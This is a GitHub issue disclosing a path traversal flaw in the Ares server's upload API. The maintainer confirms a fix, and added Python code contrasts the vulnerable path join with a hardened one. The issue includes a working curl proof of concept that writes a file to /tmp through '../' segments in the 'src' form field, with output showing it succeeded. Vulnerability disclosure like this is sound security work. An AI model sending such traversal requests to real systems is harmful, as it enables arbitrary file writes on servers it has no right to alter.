Closed justinsteven closed 8 years ago
The upload API allows for creation of files on disk in arbitrary locations with arbitrary content.
https://github.com/sweetsoftware/Ares/blob/140c05f83d18af85efb5258530016f83674c5e55/server/server.py#L93-L109
% curl -v -X 'POST' -H 'Content-Type: multipart/form-data; boundary=--------1058259938' --data-binary $'----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"botid\"\x0d\x0a\x0d\x0a1\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"src\"\x0d\x0a\x0d\x0a../../../../../../../../tmp/traversal\x0d\x0a----------1058259938\x0d\x0aContent-Disposition: form-data; name=\"uploaded\"; filename=\"uploaded\"\x0d\x0a\x0d\x0awin\x0d\x0a----------1058259938--\x0d\x0a' http://172.17.24.130:8080/api/upload
* Hostname was NOT found in DNS cache
*   Trying 172.17.24.130...
* Connected to 172.17.24.130 (172.17.24.130) port 8080 (#0)
> POST /api/upload HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 172.17.24.130:8080
> Accept: */*
> Content-Type: multipart/form-data; boundary=--------1058259938
> Content-Length: 303
>
* upload completely sent off: 303 out of 303 bytes
< HTTP/1.1 200 OK
< Date: Sun, 13 Dec 2015 07:16:29 GMT
< Content-Length: 125
< Content-Type: text/html;charset=utf-8
* Server CherryPy/3.5.0 is not blacklisted
< Server: CherryPy/3.5.0
<
* Connection #0 to host 172.17.24.130 left intact
Uploaded: <a href="../uploads/1/../../../../../../../../tmp/traversal">../uploads/1/../../../../../../../../tmp/traversal</a>

% cat /tmp/traversal
win
Hello @justinsteven,
Thanks a lot for your feedback! I just fixed this along with the botid form field, which was also injectable.
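The root cause reported above is a client-controlled path segment joined straight onto the upload directory. The block below is an added example, not code from the Ares project: it reproduces that join pattern next to a hardened version that validates the bot id, strips directory components from the filename, and verifies the resolved path stays inside the per-bot directory. UPLOAD_ROOT and the function names are assumptions for illustration.

```python
import os
import re

# Constructed for this example; the Ares server's real upload directory is
# not taken from the page.
UPLOAD_ROOT = "/var/ares/uploads"
BOTID_RE = re.compile(r"^[0-9]+$")


def vulnerable_upload_path(botid, src):
    """The pattern behind the report: 'src' (and 'botid') come from the
    request and are joined onto the upload root, so '../' escapes it."""
    return os.path.normpath(os.path.join(UPLOAD_ROOT, botid, src))


def safe_upload_path(botid, src, root=UPLOAD_ROOT):
    """Return an absolute path guaranteed to lie under root/<botid>."""
    # The bot id is a path segment too, so it must be a plain integer.
    if not BOTID_RE.match(botid):
        raise ValueError("invalid botid")
    # Keep only the last component; treat backslashes as separators as well.
    name = os.path.basename(src.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("invalid filename")
    bot_dir = os.path.realpath(os.path.join(root, botid))
    target = os.path.realpath(os.path.join(bot_dir, name))
    # Defence in depth: confirm containment after resolution, so a symlink
    # or a later refactor of the join cannot silently reopen the hole.
    if os.path.commonpath([bot_dir, target]) != bot_dir:
        raise ValueError("path escapes upload directory")
    return target


def escapes_root(path, root=UPLOAD_ROOT):
    """True when the normalised path lies outside root."""
    root = os.path.normpath(root)
    return os.path.commonpath([root, os.path.normpath(path)]) != root


def rejected(botid, src):
    """Helper for checks: does the hardened function refuse this input?"""
    try:
        safe_upload_path(botid, src)
    except ValueError:
        return True
    return False
```

With the report's `src` value, the vulnerable join normalises to /tmp/traversal, while the hardened version stores the file as `traversal` inside the bot's own directory.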